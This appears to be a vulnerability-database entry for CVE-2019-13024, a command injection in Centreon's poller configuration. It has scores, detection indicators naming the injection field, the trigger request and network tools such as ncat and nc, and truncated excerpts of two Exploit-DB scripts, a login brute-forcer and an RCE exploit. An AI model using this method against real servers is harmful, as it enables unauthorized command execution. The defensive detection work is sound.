CVE-2019-13024
published 2019-07-01CVE-2019-13024: Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allows the attacker to execute arbitrary system commands by using the value…
PriorityP274high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
32.16%
98.1th percentile
Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allows the attacker to execute arbitrary system commands by using the value "init_script"-"Monitoring Engine Binary" in main.get.php to insert a arbitrary command into the database, and execute it by calling the vulnerable page www/include/configuration/configGenerate/xml/generateFiles.php (which passes the inserted value to the database to shell_exec without sanitizing it, allowing one to execute system arbitrary commands).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| centreon | centreon | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor POST requests to /include/configuration/configGenerate/xml/generateFiles.php with parameters poller, debug, and generate — this is the trigger endpoint that causes shell_exec of the injected command. ↗
- →Detect POST requests to /main.get.php?p=60901 (Poller configuration page) where the nagios_bin field contains shell metacharacters or unexpected binaries (e.g., ncat, bash, nc) — this is the injection point for the malicious command. ↗
- →Alert on the init_script / Monitoring Engine Binary field (nagios_bin) in Centreon poller configuration containing shell operators or network tools — the value is stored in the database and later executed via shell_exec. ↗
- →Detect POST requests to /centreon/api/index.php?action=authenticate with high frequency from a single source IP — this endpoint is targeted by the brute-force stage that precedes RCE exploitation. ↗
- →Look for the POST body parameter combination of poller=1&debug=true&generate=true to /generateFiles.php as a reliable indicator of exploitation attempt. ↗
- ·Exploitation requires prior authentication to Centreon; attackers must obtain valid credentials (e.g., via brute force against the API) before injecting the payload. ↗
- ·The injected nagios_bin payload uses a trailing '#' comment character to suppress the remainder of the legitimate command string — detection rules should account for this obfuscation pattern. ↗
- ·Affected versions span Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29; detections should be scoped to these versions. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Centron 19.04 - Remote Code Execution (RCE)
exploitdb·2025-04-10
CVE-2019-13024 Centron 19.04 - Remote Code Execution (RCE)
Centron 19.04 - Remote Code Execution (RCE)
---
# Exploit Title : Centron 19.04 - Remote Code Execution (RCE)
# Tested on Centreon API 19.04.0
# Centreon 19.04 - Login Password Bruteforcer
# Written on 6 Nov 2019
# Referencing API Authentication of the Centreon API document
# Author: st4rry
# centbruteon.py
# Centreon Download Link: https://download.centreon.com/#version-Older
# Dependencies: sys, requests, argparse, termcolor, os
#!/usr/bin/env python3
import sys
import requests
import argparse
from termcolor import colored
import os
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
parser.add_argument('--https', de
Exploit-DB
Centreon 19.04 - Remote Code Execution
exploitdb·2019-07-02·CVSS 8.8
CVE-2019-13024 [HIGH] Centreon 19.04 - Remote Code Execution
Centreon 19.04 - Remote Code Execution
---
#!/usr/bin/python
'''
# Exploit Title: Centreon v19.04 authenticated Remote Code Execution
# Date: 28/06/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-13024
# Vendor Homepage: https://www.centreon.com/
# Software link: https://download.centreon.com
# Version: v19.04
# Tested on: CentOS 7.6 / PHP 5.4.16
'''
import requests
import sys
import warnings
from bs4 import BeautifulSoup
# turn off BeautifulSoup warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 6:
print(len(sys.argv))
print("[~] Usage : ./centreon-exploit.py url username password ip port")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
request = requests.se
No writeups or analysis indexed.
http://packetstormsecurity.com/files/153504/Centreon-19.04-Remote-Code-Execution.htmlhttps://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-18.10/centreon-18.10.6.htmlhttps://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-19.04/centreon-19.04.3.htmlhttps://gist.github.com/mhaskar/c4255f6cf45b19b8a852c780f50576dahttps://github.com/centreon/centreon/pull/7694https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/http://packetstormsecurity.com/files/153504/Centreon-19.04-Remote-Code-Execution.htmlhttps://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-18.10/centreon-18.10.6.htmlhttps://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-19.04/centreon-19.04.3.htmlhttps://gist.github.com/mhaskar/c4255f6cf45b19b8a852c780f50576dahttps://github.com/centreon/centreon/pull/7694https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/
2019-07-01
Published